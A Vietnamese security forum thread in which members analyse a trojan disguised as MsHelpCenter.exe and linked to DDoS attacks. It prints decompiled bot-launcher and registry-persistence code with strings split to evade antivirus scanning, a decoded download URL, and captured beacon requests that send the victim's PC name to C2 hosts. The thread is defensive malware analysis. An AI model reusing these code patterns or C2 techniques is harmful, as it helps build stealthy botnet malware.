Giờ rãnh rỗi, ngồi úp cái đống MsHelpCenter.* lên KIS, MS, Avira, Symantec. Mô tả bằng tiếng Anh khó quá. Thôi viết tiếng Việt rồi dùng Google Translate ra đại cho rồi. Hy vọng mấy thằng bên đó đọc hiểu được 50%. Mấy anh STL chơi ác quá ha, nhét dump bitmap, dump resource data vào mấy cái file của mấy anh để mấy file đó bự bà cố luôn, 8-9 MB, để bà con khỏi úp lên các AV và các online scan phải không ? Hồi chiều, ngồi tự hỏi: quái, tụi này không không nhét mấy cái "Background" Bmp Resource tới 8-9 MB vào file PE của tụi nó chi vầy ? Đọc code, debug, breakpoint đủ kiểu chả thấy nó đụng tới Bmp Resource gì cả ! Không sao, em remove mấy cái dump resource, dump bitmap đó đi, up tuốt. Giờ úp lại nè, nãy giờ úp 2 lần đều faild hết. File em đã úp cái đống đó lên tới 26MB. Giờ up được rồi. File up chỉ còn 247 KB, chuyện nhỏ. Tụi này dùng giới hạn up file của các trang web submit sample của các AVs, thông thường là 8 MB.

Phân tích tính chất vài trận DDoS HVA vừa qua.

template — GMT

Cố gắng lên anh TQN, sẵn luyện TOEFL luôn Bọn STL này gặp anh ai chứ gặp anh TQN thì nên đi ngủ sớm

Phân tích tính chất vài trận DDoS HVA vừa qua.

Rolex0210 — GMT

Đọc xong cả Topic cho đến lúc này e chỉ có 1 câu để nói là: Các thành viên trong HVA quá tuyệt vời :) Phối hợp với nhau cứ như 1 đội hình... chả biết dùng từ gì nữa ^^ Em có cộng tác với 1 vài tờ báo mạng, định sẽ viết 1 bài tóm lược về việc phân tích và kết quả đạt được như trên của mấy a để cho mọi người cùng xem, không biết có phiền gì không ạ ???

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Quá tốt, viết thì cứ viết, đừng ngại gì cả. Viết để phổ biến cho mọi người biết về dịch bệnh âm ỉ stl này và chữa trị !

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

Rolex0210 wrote:

Đọc xong cả Topic cho đến lúc này e chỉ có 1 câu để nói là: Các thành viên trong HVA quá tuyệt vời :) Phối hợp với nhau cứ như 1 đội hình... chả biết dùng từ gì nữa ^^ Em có cộng tác với 1 vài tờ báo mạng, định sẽ viết 1 bài tóm lược về việc phân tích và kết quả đạt được như trên của mấy a để cho mọi người cùng xem, không biết có phiền gì không ạ ???

bolzano_1989 nghĩ anh/chị nên gửi anh TQN xem qua trước khi đưa bài viết lên báo để tránh các sai sót về kĩ thuật :) .

Phân tích tính chất vài trận DDoS HVA vừa qua.

Rolex0210 — GMT

Dạ đúng như vậy. E chỉ nắm được là chúng ta đang tìm cái "gốc" để từ đó mà nhận dạng, tránh để bị ảnh hưởng xấu từ thứ độc hại mà bọn STL gây ra ( em bị nhiễm a TQN rùi =.=' ) còn mấy cái tool và thuật ngữ chuyên ngành em vẫn đang tìm cách giải thích, so sánh sao cho người ngoài ngành cntt vẫn hiểu được. Cái chính là e muốn nêu lên tinh thần đoàn kết và sự nhiệt tình với công việc của mọi người trong HVA :)

Phân tích tính chất vài trận DDoS HVA vừa qua.

tmd — GMT

Viết báo thì phải biết là viết cho ai đọc. Vậy là đủ rồi. Bài đăng thông tin thông báo, thông tin gợi ý, thông tin kỹ thuật chuyên môn, thông tin phòng chống, thông tin định danh chủ thể phá hoại, hoặc thông tin kịch tính kiểu như báo lá cải.... Tuỳ chọn, người viết đừng quá sa đà vào kiểu gán gép , chỉ đích danh hoặc bài báo "huyền bí" về nội dung.

Phân tích tính chất vài trận DDoS HVA vừa qua.

lequi — GMT

G4GD7ND0CDL4DB7CB0CD3ED6KD9YC2FDYN7BD0OCP4JD7QD0ED3FD6HDO0TC3OC6CD chứa đường dẫn được mã hoá, key là n / 123 = 456. Thuật toán mã hoá thì mình chưa xem kĩ nhưng thiết nghĩ không cần lắm vì xâu này cố định rồi. nó sau khi giải mã ra là http://poxxf.com/flash.swf , tải file này về với User Agent là Gozilla_2/Default. cái link để download là http://poxxf.com/flash.swf?cpn= name>

Thôi tiêu, em vừa thấy acoustics89 nhắc đến User Agent: Gozilla và cấu trúc request kiểu ?cpn=[PC USERNAME] Bài trước em có nhắc đến User Agent này, vì vội quá nên chưa gửi cho a PXMMRF được. Phải chăng file unikey ở http://nethoabinh.com/showthread.php?t=315, và nghi ngờ ở http://nethoabinh.com/showthread.php?t=651 cũng của STL (nhưng file này đã bị xoá) ??? Các từ khoá liên quan đến việc tải unikey, flash player trên google trang này (nethoabinh) đều có kết quả đứng đầu (top). Vừa bật lại cái Wireshark, có 1 vài thông tin bắt được (tên miền gì toàn tiếng Trung Quốc >"<):

maowoli.dyndns-free.com (Destination IP: 78.110.24.85) biouzhen.dyndns-server.com (Destination IP: 78.110.24.85) tongfeirou.dyndns-web.com (Destination: server86944.santrex.net)

Vẫn chưa biết được service/process nào liên quan đến những URL này :(. Em đang bật smartsniff của nirsoft nhưng tình hình có vẻ im lặng quá. Ngóng chờ tiếp :(

Phân tích tính chất vài trận DDoS HVA vừa qua.

lequi — GMT

1 vài packet vừa bắt được, nhưng em kiểm tra smartsniff hình như ko biết được processId

GET /banner1.png?cpn=LEQUY-PC HTTP/1.1 Host: maowoli.dyndns-free.com User-Agent: Gozilla_2/General Accept: */* Pragma: no-cache Cache-Control: no-cache Connection: close GET /banner1.png?cpn=LEQUY-PC HTTP/1.1 Host: biouzhen.dyndns-server.com User-Agent: Gozilla_2/General Accept: */* Pragma: no-cache Cache-Control: no-cache Connection: close GET /banner1.png?cpn=LEQUY-PC HTTP/1.1 Host: tongfeirou.dyndns-web.com User-Agent: Gozilla_2/General Accept: */* Pragma: no-cache Cache-Control: no-cache Connection: close GET /banner1.png?cpn=LEQUY-PC HTTP/1.1 Host: maowoli.dyndns-free.com User-Agent: Gozilla_2/General Accept: */* Pragma: no-cache Cache-Control: no-cache Connection: close GET /banner1.png?cpn=LEQUY-PC HTTP/1.1 Host: biouzhen.dyndns-server.com User-Agent: Gozilla_2/General Accept: */* Pragma: no-cache Cache-Control: no-cache Connection: close

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

TQN wrote:

Giờ rãnh rỗi, ngồi úp cái đống MsHelpCenter.* lên KIS, MS, Avira, Symantec. Mô tả bằng tiếng Anh khó quá. Thôi viết tiếng Việt rồi dùng Google Translate ra đại cho rồi. Hy vọng mấy thằng bên đó đọc hiểu được 50%. Mấy anh STL chơi ác quá ha, nhét dump bitmap, dump resource data vào mấy cái file của mấy anh để mấy file đó bự bà cố luôn, 8-9 MB, để bà con khỏi úp lên các AV và các online scan phải không ? Hồi chiều, ngồi tự hỏi: quái, tụi này không không nhét mấy cái "Background" Bmp Resource tới 8-9 MB vào file PE của tụi nó chi vầy ? Đọc code, debug, breakpoint đủ kiểu chả thấy nó đụng tới Bmp Resource gì cả ! Không sao, em remove mấy cái dump resource, dump bitmap đó đi, up tuốt. Giờ úp lại nè, nãy giờ úp 2 lần đều faild hết. File em đã úp cái đống đó lên tới 26MB. Giờ up được rồi. File up chỉ còn 247 KB, chuyện nhỏ. Tụi này dùng giới hạn up file của các trang web submit sample của các AVs, thông thường là 8 MB.

Hì hì, em cứ viết 1 bức thư bằng tiếng Việt, trình bày cụ thể từng chi tiết theo góc độ kỹ thuật em nhận định rồi gởi cho anh. Anh chuyển nó sang tiếng Anh và gởi ngược lại cho em ngay trong vòng vài phút. Đừng dùng google translate em vì nó buồn cười lắm :).

Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo — GMT

2 trang YeuHoaBinh.com và NetHoaBinh.com có rank là 682 và 688 (theo thứ tự các website ViệtNam) trên Alexa. Và...việc tìm kiếm tới UniKey luôn đứng đầu 2 site này...chứng tỏ bà còn Việt bị nhiễm malware hơi nhiều. http://www.alexa.com/siteinfo/nethoabinh.com http://www.alexa.com/siteinfo/yeuhoabinh.com Một điều đáng ngạc nhiên là như lequi nói: Khi search google về Flash Player download thì NETHOABINH.COM đứng trong top đầu mới kinh. Tuy nhiên link tới mediafire.com đã bị delete, ai có file Flash Player này thì tốt quá. Mà cái bạn "LAM VOI" trên NETHOABINH có vẻ hâm mộ TQ quá, avatar là anh LÝ THÀNH LONG, lại còn học tiếng Trung Quốc.... @lequi: check traffic qua nettop cho các domain mà bạn đưa ra thì hầu hết là ZERO, và các domain này vừa mới được thiết lập (vào khoảng thời gian đầu tháng 7).

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

@lequi: chắc anh em lại cùng với bạn phối hợp lấy mẫu như hôm qua. xong bạn up mẫu lên đây nhé, mọi người phân tích cũng nhanh thôi

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

PXMMRF wrote:

bolzano_1989 wrote:

PXMMRF wrote:

Tôi cho rằng cần phải xem lai cái file MsHelpCenter.exe Đây là file chính thức của MS mà. Nó được digitally signed ngon lành bởi MS mà original name: MsHelpCenter.exe internal name: (cũng là) MsHelpCenter.exe file version.: 6.1.7600.16385 MD5 : 915e9432ca9414a771071ee0cc115930 SHA1 : 9ec74f80c7b03ff2ab4ecbe57b5a1d0296a3bee6 SHA256: b34852815cffab3bfb557e552f8566f80cbe2915895bae9b6e7d085eab7e7f6d ssdeep: 3072:acFDLF09RoMPXa5zgKSfpBitAggb4d/VpvF2CmsNd:tFDLFFW8gbpUt7V7Vms File size : 9332736 bytes OK?
Cháu xem kết quả sigcheck ở link sau thì thấy là unsigned :) : http://www.virustotal.com/file-scan/report.html?id=b34852815cffab3bfb557e552f8566f80cbe2915895bae9b6e7d085eab7e7f6d-1311589090
Nó đây nè bolzano_1989 ạ Chú ý trong folder có tên là MsHelpCenter mà bạn asaxin upload lên Mediafire có 2 file: MsHelpcenter.exe và MsHelpCenter.idx. File MsHelpCenter.idx mới có Trojan còn file kia MsHelpCenter.exe (.exe file-fice chạy) thì lai là 1 file nguyên thuỷ của MS. Bản phân tích của MsHelpCenter.exe đây nè:

Gửi chú PXMMRF, Những kết quả sigcheck sau có được là do đám STL làm giả để đánh lừa advanced user:

sigcheck: publisher....: Microsoft Corporation copyright....: (c) Microsoft Corporation. All rights reserved. product......: Microsoft_ Windows_ Operating System description..: Microsoft Help Center original name: MsHelpCenter.exe internal name: MsHelpCenter.exe file version.: 6.1.7600.16385

Quan trọng nhất khi sigcheck MsHelpCenter.exe là các dòng sau: Verified: Unsigned File date: 9:34 AM 12/31/2010 Vào thời điểm này, Microsoft USA không thể có người làm việc liên quan đến file MsHelpCenter.exe này :) . Đồng thời file này không được digitally signed bởi Microsoft Windows.

Phân tích tính chất vài trận DDoS HVA vừa qua.

exception — GMT

Các bạn submit các mẫu cho tất cả các AV luôn nhé: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=1018

Phân tích tính chất vài trận DDoS HVA vừa qua.

ptv_vbhp — GMT

Em dùng Bkav pro . Hôm trước down mấy mẫu về thấy nó nhai ngon lành . Hic hic ... Cả file fake kia lẫn cái file *.dix

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

bolzano_1989 wrote:

Gửi chú PXMMRF, Những kết quả sigcheck sau có được là do đám STL làm giả để đánh lừa advanced user:
sigcheck: publisher....: Microsoft Corporation copyright....: (c) Microsoft Corporation. All rights reserved. product......: Microsoft_ Windows_ Operating System description..: Microsoft Help Center original name: MsHelpCenter.exe internal name: MsHelpCenter.exe file version.: 6.1.7600.16385
Quan trọng nhất khi sigcheck MsHelpCenter.exe là các dòng sau: Verified: Unsigned File date: 9:34 AM 12/31/2010 Vào thời điểm này, Microsoft USA không thể có người làm việc liên quan đến file MsHelpCenter.exe này :) . Đồng thời file này không được digitally signed bởi Microsoft Windows.

Trước hết cám ơn bolzano_1989 vì đã quote lai các file hình ảnh trên bài tôi viết. Tôi thường bổ sung hình ảnh để bài viết khỏi nhàm chán, các bạn đỡ mất công phải click nhiều lần và xem cho sướng mắt. Cũng còn có đôi lý do khác, hay hay đấy. Sau nữa cảm ơn về những đóng góp của bạn, thể hiện việc bạn luôn không ngai khó, tìm hiểu đến cùng những vấn đề mình chưa biết hay chưa đồng ý. Đó là đức tinh quý và cần của người làm bảo mật. Trước đây Triệu trần Đức cũng có đức tính này. Quay trở lại vấn đề file MSHelpCenter.exe, tôi có thêm ý kiến sau: 1- Đây là file nguyên thuỷ (originally made) của MS. Hầu hết các OS của MS đều sử dụng file này. 2- Nhưng cũng vì vậy có rất nhiều phiên bản (version) của file nói trên. MS lọc -cắt bớt- bổ sung file nguyên thuỷ cho phù hợp với từng OS. Vì vậy nói về file MSHelpCenter.exe là phải nói chính xác là nó ở OS nào, đã được update chưa? Đã có một công ty chuyên làm về File Database thống kê hiên nay có tới gần 60 loại file MSHelpCenter.exe với nôi dung có các điểm khác nhau, dung lượng khác nhau (tất nhiên MD5 cũng khác nhau) Tham khảo tại: http://systemexplorer.net/db/mshelpcenter.exe.html 3- Có lẽ chính vì vậy mà MS khó hay không thể áp dụng việc Digitally signed cho tất cả các file MSHelpCenter.exe trong thưc tế. Tất nhiên các file khác chỉ có 1 version hay một vài version thì có thể. 4- Như tôi đã nói ở post trên, các hacker hay đặt tên các service, process, file của virus trùng đúng với tên service, process, file nguyên thuỷ của các HDH, nhằm làm cho user không nghi ngờ hay nếu nghi ngờ thì lại bối rối .... Do vậy không loại trừ khả năng có một hacker nào đó trên TG đã đặt tên file của virus là MSHelpCenter.exe, hay nhúng virus vào trong file này (Thưc tế điều này đã có- Xin xem hình cho đỡ mỏi tay click)

5- Trong trường hợp nghi ngờ một file loại này có virus mà không thể kiểm bằng digitally signed thì đành phải kiểm bằng cách khác, như tôi đã nói: kiểm vị trí đúng (right location) của file trong directory. Hacker không có thể đặt các file trùng tên trong một folder, nhưng trong 2 folder khác nhau thì lại được. Tuy nhiên ở các OS khác nhau thì vị trí đúng của file có thể khác nhau. Đó là điều khó. Và cách đáng tin nhất nhất là check nó trên mạng để kiểm tra có nhiễm virus hay không, như tôi đã làm với file MSHelpCenter.exe và post hình lên. Tuy nhiên tôi chỉ xác nhân là cái file MSHelpCenter.exe (nằm trong một folder có tên là "MSHelpCenter"- being zipped) mà bạn asaxin upload lên Mediafire vừa qua là không có virus thôi (nhưng file MSHelpCenter.idx, cũng trong folder nói trên, là có virus rõ ràng). Tôi không biết và không đề cập đến tất cả các file MSHelpCenter.exe khác ngoài file nói trên

Phân tích tính chất vài trận DDoS HVA vừa qua.

rang0 — GMT

PXMMRF wrote:

Tuy nhiên tôi chỉ xác nhân là cái file MSHelpCenter.exe (nằm trong một folder có tên là "MSHelpCenter"- being zipped) mà bạn asaxin upload lên Mediafire vừa qua là không có virus thôi (nhưng file MSHelpCenter.idx, cũng trong folder nói trên, là có virus rõ ràng). Tôi không biết và không đề cập đến tất cả các file MSHelpCenter.exe khác

Gửi anh PXMMRF, Em không biết anh có đọc mấy bài trước của anh TQN và bạn acoustics89 phân tích hay không mà anh lại khẳng định như thế ạ ? File MSHelpCenter (MD5: 915E9432CA9414A771071EE0CC115930) được zip cùng file MSHelpCenter.idx mà bạn asaxin đã upload rõ ràng là malware. Chính nó là con download AcrobatUpdater.exe về đấy ạ. Theo như hình kết quả từ virustotal, chưa có chương trình AV nào detect em nó không có nghĩa là em nó clean, và mấy cái thông tin internal name, orginal name, ... hoàn toàn có thể fake được mà anh. Rang0 !

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

rang0 wrote:

PXMMRF wrote:

Tuy nhiên tôi chỉ xác nhân là cái file MSHelpCenter.exe (nằm trong một folder có tên là "MSHelpCenter"- being zipped) mà bạn asaxin upload lên Mediafire vừa qua là không có virus thôi (nhưng file MSHelpCenter.idx, cũng trong folder nói trên, là có virus rõ ràng). Tôi không biết và không đề cập đến tất cả các file MSHelpCenter.exe khác
Gửi anh PXMMRF, Em không biết anh có đọc mấy bài trước của anh TQN và bạn acoustics89 phân tích hay không mà anh lại khẳng định như thế ạ ? File MSHelpCenter (MD5: 915E9432CA9414A771071EE0CC115930) được zip cùng file MSHelpCenter.idx mà bạn asaxin đã upload rõ ràng là malware. Chính nó là con download AcrobatUpdater.exe về đấy ạ. Theo như hình kết quả từ virustotal, chưa có chương trình AV nào detect em nó không có nghĩa là em nó clean, và mấy cái thông tin internal name, orginal name, ... hoàn toàn có thể fake được mà anh. Rang0 !

Tôi đọc kỹ, rất kỹ là khác. Nhưng chính TQN cũng đang thấy cần phải kiểm tra lai mà. Xem những post cuối cùng của TQN (xem kỹ nhé- Thanks)

Phân tích tính chất vài trận DDoS HVA vừa qua.

rang0 — GMT

int __stdcall wWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPWSTR lpCmdLine, int nShowCmd) { int v4; // eax@0 unsigned int v6; // [sp-10h] [bp-38h]@1 HANDLE hObject; // [sp+0h] [bp-28h]@12 DWORD ThreadId; // [sp+4h] [bp-24h]@12 WCHAR v9; // [sp+8h] [bp-20h]@4 LPCWSTR lpFileName; // [sp+Ch] [bp-1Ch]@4 unsigned int *v11; // [sp+10h] [bp-18h]@1 int v12; // [sp+18h] [bp-10h]@1 int (__cdecl *v13)(int, PVOID, int); // [sp+1Ch] [bp-Ch]@1 unsigned int v14; // [sp+20h] [bp-8h]@1 int v15; // [sp+24h] [bp-4h]@1 int v16; // [sp+28h] [bp+0h]@1 v13 = _except_handler4; v12 = v4; v14 = __security_cookie ^ (unsigned int)&unk_4126C8; v6 = (unsigned int)&v16 ^ __security_cookie; v11 = &v6; v15 = 0; SetUnhandledExceptionFilter(TopLevelExceptionFilter); if ( lstrlenW(lpCmdLine) <= 3 ) { if ( !lstrlenW(lpCmdLine) ) { ThreadId = 0; hObject = CreateThread(0, 0x80000u, StartAddress, 0, 0, &ThreadId); CloseHandle(hObject); create_bot(); } } else { if ( *lpCmdLine == '-' && lpCmdLine[2] == ' ' ) { v9 = lpCmdLine[1]; lpFileName = lpCmdLine + 3; switch ( v9 ) { case 'd': delete_file(lpFileName); break; case 'r': create_process(lpFileName, &CommandLine, 0); break; case 'b': create_new_process(lpFileName, 0); break; } } } return 0; }

và Code:

lstrcpyW(&SubKey, L"softw");
  lstrcatW(&SubKey, L"are\\micr");
  lstrcpyW((LPWSTR)&v6, L"kjewoopipo");
  lstrcatW(&SubKey, L"osoft\\w");
  lstrcpyW((LPWSTR)&v6, L"rewfe");
  lstrcatW(&SubKey, L"indo");
  lstrcatW(&SubKey, L"ws\\");
  lstrcatW(&SubKey, L"Microsoft Help Center");
  RegCreateKeyExW(HKEY_CURRENT_USER, &SubKey, 0, 0, 0, 0xF003Fu, 0, &hKey, &dwDisposition);
  cbData = 2000;
  v12 = RegQueryValueExW(hKey, ValueName, 0, &Type, (LPBYTE)Data, &cbData);
  if ( v12 )
  {
    v1 = lstrlenW((LPCWSTR)Data);
    RegSetValueExW(hKey, ValueName, 0, 1u, (const BYTE *)Data, 2 * v1);
  }
  RegCloseKey(hKey);

Em cũng không biết có file MSHelpCenter nào của MS mà nó có hành vi như trên không nữa ạ ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

ptv_vbhp wrote:

Em dùng Bkav pro . Hôm trước down mấy mẫu về thấy nó nhai ngon lành . Hic hic ... Cả file fake kia lẫn cái file *.dix

BKAV pro đã phát hiện ra virus-trojạn trong file MSHelpCenter.idx rồi à? .Rất hoan nghênh. Nhưng Virus DAT file update vào ngày nảo? Tháng 6, tháng 7/2011?

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

là người viết các kết quả phân tích; Em tự tin vào cái mà em lần ra, em tự tin và khẳng định nó là virus ạ. Cho dù các phần mềm khác có đưa kết quả clean đi nữa, em vẫn chỉ tin vào Olly và IDA. trong MSHelpCenter.exe File Offset 000136B0h: G4GD7ND0CDL4DB7CB0CD3ED6KD9YC2FDYN7BD0OCP4JD7QD0ED3FD6HDO0TC3OC6CD địa chỉ của hàm decode :401B30h Hàm download : 4015B0h Ngoài ra còn hàm này để ghi key trong registry:4017F0h Cái xâu bị cắt vụn ra, tránh emulator, dò string của các av, liệu có coder nào rảnh đến mức cắt như thế không ạ

Phân tích tính chất vài trận DDoS HVA vừa qua.

ptv_vbhp — GMT

PXMMRF wrote:

BKAV pro đã phát hiện ra virus-trojạn trong file MSHelpCenter.idx rồi à? [/color].Rất hoan nghênh. Nhưng Virus DAT file update vào ngày nảo? Tháng 6, tháng 7/2011?

Con fake adobe thì em thấy mới có thứ 7 tuần trước, còn con idx kia thì em ko biết rõ vì máy em ko có file này để check lúc trước :D .

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

rang0 wrote:

Em cũng không biết có file MSHelpCenter nào của MS mà nó có hành vi như trên không nữa ạ ?

Tôi ghi nhân ý kiến của bạn và tôi sẽ nghiên cứu kỹ để làm rõ 1 vài vấn đề đến nay tôi vẫn còn thắc mắc. Thanks (Tôi cũng sẽ kiểm tra lai code của file này lần nữa, dù kinh nghiêm khả năng về mặt này thưc ra không bằng TQN) Đó là: 1 -Service, process nào download các file MSHelpCenter.exe về máy hoăc process nào inject malicious code vào file này?? ( Ngay từ lúc đầu file MSHelpCenter.exe có bị nhúng virus hay không?) 2- Virus-Trojạn nằm trong file MSHelpCenter.idx có quan hệ tác động gì đến file MSHelpCenter.exe, khi nào, tiến trình xảy ra theo trình tự thế nào khi máy bị nhiễm virus? 3- File đầu tiên gây nhiễm cho máy user mà user download về trên mạng (thí dụ Vietkey, Unikey....) là file nào trong trường hợp này.? Dĩ nhiên không phải là chính các file MSHelpCenter.exe hay MSHelpCenter.idx, vì dung lượng của chúng quá lơn, mà cũng chẳng ai lai cần download chúng về làm gì cả Vậy bạn có ý kiến thế nào về những vấn đề tôi đang thắc mắc, để tôi có thể giải toả và có kết luận cuối cùng cho mình??

Phân tích tính chất vài trận DDoS HVA vừa qua.

lequi — GMT

acoustics89 wrote:

@lequi: chắc anh em lại cùng với bạn phối hợp lấy mẫu như hôm qua. xong bạn up mẫu lên đây nhé, mọi người phân tích cũng nhanh thôi

Mình rất sẵn lòng. Mớ packet và các nghi ngờ của mình bắt đầu xuất hiện từ sau khi chạy setup unikey này http://nethoabinh.com/showthread.php?t=315). Mình vẫn chưa lần mò ra được gì :(, có thể máy mình vẫn đang có trojian, nhưng có thể đây là 1 phiên bản trước đây khá lâu (tháng 11/2009), các user-agent và url đều khác, mặc dù cấu trúc là giống nhau (Gozilla và ?cpn). Không biết mình phải làm gì tiếp đây?

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

acoustics89 wrote:

là người viết các kết quả phân tích; Em tự tin vào cái mà em lần ra, em tự tin và khẳng định nó là virus ạ. Cho dù các phần mềm khác có đưa kết quả clean đi nữa, em vẫn chỉ tin vào Olly và IDA. trong MSHelpCenter.exe File Offset 000136B0h: G4GD7ND0CDL4DB7CB0CD3ED6KD9YC2FDYN7BD0OCP4JD7QD0ED3FD6HDO0TC3OC6CD địa chỉ của hàm decode :401B30h Hàm download : 4015B0h Ngoài ra còn hàm này để ghi key trong registry:4017F0h Cái xâu bị cắt vụn ra, tránh emulator, dò string của các av, liệu có coder nào rảnh đến mức cắt như thế không ạ

Cám ơn các thông tin của em và anh rất tin vào những dòng code em post lên, nó đã rõ ràng như em nhận định. Nhưng chỉ hỏi thêm điều này, nêu thấy không tiện thì không trả lời cũng được: Em có chắc chắn máy em dùng dể desassembling các file ấy có "clean" 100% hay không? Note. Anh đã cẩn thận check file MSHelpCenter.exe không chỉ trên virustotal mà còn trên ít nhất 8 filechecking website khác nữa, của các hảng antivirus nổi tiếng nhất. Hì hì

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

Em toàn dùng máy ảo để desassembling code , tất cả đều trong máy ảo cả. Máy ảo em tự cài từ đầu, các phần mềm bên trong cũng qua kiểm duyệt hết rồi Bây giờ đơn giản là anh dùng 1 chương trình Hex editor, jump đến các offset trong file MSHelpCenter.exe như em nói xem có đúng là nó thế hay không, chương trình hex editor nào cũng được. Nếu nó đúng, thì đó là 1 bằng chứng, 1 ví dụ về việc : các av bây giờ cũng chưa phải quá mạnh, việc tin tưởng vào nó là hơi phiêu lưu và mạo hiểm. Mặc dù đã được trang bị các công nghệ như emulator, Heurristic, thì vẫn không thể tin tưởng được. Có thể là 1 chiêu marketing của các AV... Và bây giờ, công nghệ tạo ra malware đang đi trước chung ta 1 bước. Hiện thực đáng sợ này bao giờ mới chấm dứt đây

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

lequi wrote:

acoustics89 wrote:

@lequi: chắc anh em lại cùng với bạn phối hợp lấy mẫu như hôm qua. xong bạn up mẫu lên đây nhé, mọi người phân tích cũng nhanh thôi
Mình rất sẵn lòng. Mớ packet và các nghi ngờ của mình bắt đầu xuất hiện từ sau khi chạy setup unikey này http://nethoabinh.com/showthread.php?t=315). Mình vẫn chưa lần mò ra được gì :(, có thể máy mình vẫn đang có trojian, nhưng có thể đây là 1 phiên bản trước đây khá lâu (tháng 11/2009), các user-agent và url đều khác, mặc dù cấu trúc là giống nhau (Gozilla và ?cpn). Không biết mình phải làm gì tiếp đây?

Cám ơn nhiệt tình đáng quí của em. Mình làm việc này không chỉ cho HVA, mà còn có lơi cho công đồng, đất nước. Tôi sẽ phân tích các lý do của những hành động mà STL (tay sai cho Tầu) đã làm vừa qua. Việc phát hiện thông qua kỹ thuật mạng để biết STL liên quan chặt chẽ với chính quyền TQ đã khó rồi, nhưng việc sau đó lý giải một cách hơp lý lý do của các hành động của STL thời gian qua lai khó hơn rất nhiều. Quay trở lai vấn đề của topic. Với các thông tin của các bạn trong đó có lequi tôi đã tìm thấy ít nhất 5 master website-server của STL và đã check kỹ vào chúng để có các thông tin. Chúng đặt ở nhiều nơi trên TG. Điều ngạc nhiên là trong số 5 website-webserver nói trên có một cái khá hoành tráng về quy mô và cấu hình. Không hiểu có phải webserver này đã bị STL thâm nhập chiếm quyền admin.hay không? Chỉ mong các thông tin các bạn đưa ra là chính xác. Virus-Trojan liên hệ với các master-website này đúng là của STL, chứ không phải các hacker khác. Một điều mà tôi thấy chúng ta làm chưa thật tốt là chưa xác định được chính xác các process, service.. nào thưc sự kết nối đến các master website nói trên. Thưc ra để xác định chính xác điều này không dễ như tôi đã từng nhận định một cách chủ quan ở 1 bài viết trong topic này. Với tôi thì như vậy. Với các bạn khác có thể không như vậy. Các soft mà các bạn dùng như Wireshark và Process Monitoring... thưc ra không đáp ứng yêu cầu của ta, cũng không hẳn là đồ chuyên nghiệp của dân chơi mạng. Trên wireshark ta chỉ thấy các IP kết nôi (trừ khi phân tích kỹ bên trong packet thì có thể thêm vài thông tin) nhưng không thể biết các process kích hoạt kết nối. Còn trong Process Monitoring thì thấy tên các process (nhiều là khác) nhưng không hề biết các connection...vân vân. Theo tôi trong trường hợp này các bạn nên sử dung các Advanced firewall (loại mới-tiên tiến). Với firewall loai này, cùng lúc, các ban biết tên, vị trí trên directory các process kích hoạt các kết nối, đia chỉ IP và computer name của mục tiêu và kể cả RX -TX.... Firewall cũng cho phép ta ngăn sư thâm nhập sâu vào máy của virus 1 cách rất hiệu quả vì một malicious process nào của virus khởi chạy là firewall chặn lại chờ sự cho phép của ta. Vì vậy nếu ban lequi cần một firewall như vậy, thì tôi sẽ gửi đến bạn qua email. Hoăc bạn tự tìm cái tốt hơn. Có công cụ này việc ban giúp, làm sẽ dễ hơn

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

lequi wrote:

acoustics89 wrote:

@lequi: chắc anh em lại cùng với bạn phối hợp lấy mẫu như hôm qua. xong bạn up mẫu lên đây nhé, mọi người phân tích cũng nhanh thôi
Mình rất sẵn lòng. Mớ packet và các nghi ngờ của mình bắt đầu xuất hiện từ sau khi chạy setup unikey này http://nethoabinh.com/showthread.php?t=315). Mình vẫn chưa lần mò ra được gì :(, có thể máy mình vẫn đang có trojian, nhưng có thể đây là 1 phiên bản trước đây khá lâu (tháng 11/2009), các user-agent và url đều khác, mặc dù cấu trúc là giống nhau (Gozilla và ?cpn). Không biết mình phải làm gì tiếp đây?

Updated: Sau khi điều tra với anh em HVA xong, bạn có thể quét với CMC Antivirus (bản miễn phí nhưng luôn được cập nhật như bản CMCIS ấy :D ): http://pcu.cmclab.net/download/setupCMCIS.exe Tiếp theo, bạn gửi boot log với Process Monitor: Hướng dẫn scan và gửi boot log với Process Monitor http://support.cmclab.net/vn/tut0rial/h4327899ng-d7851n-scan-v224-g7917i-boot-log-v7899i-process-monitor/ Rồi gửi log Autoruns: Hướng dẫn scan và gửi log Autoruns http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autoruns/

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

Ấy lequi đừng quét virus vôi. Cứ để thế mới điều nghiên được chứ. Xong việc thì quét theo hướng dẫn trợ giúp của bolzano_1989

Phân tích tính chất vài trận DDoS HVA vừa qua.

ptv_vbhp — GMT

Có 1 điều mà em vẫn cứ thắc mắc giống bác PXMMRF là thế cái file MS...exe được đẻ ở bệnh viện nào thế :D vả lại 2 anh chàng cùng tên Ms.... có quan hệ đến nhau gì ko ấy nhở ? Còn 1 cái nữa em hỏi anh acoustics89 với :D. Theo như em phân tích file Ms...exe thì thấy cái hàm 401F90 là để giải mã lần 2 từng xâu trong file DAT down về( sau khi giải mã lần 1 file DAT đó để có link down con VB) thì được các xâu lưu trữ lại nhưng em thấy chả được cái xâu nào sau khi giải mã lần 2 ấy cả ???

Phân tích tính chất vài trận DDoS HVA vừa qua.

rang0 — GMT

PXMMRF wrote:

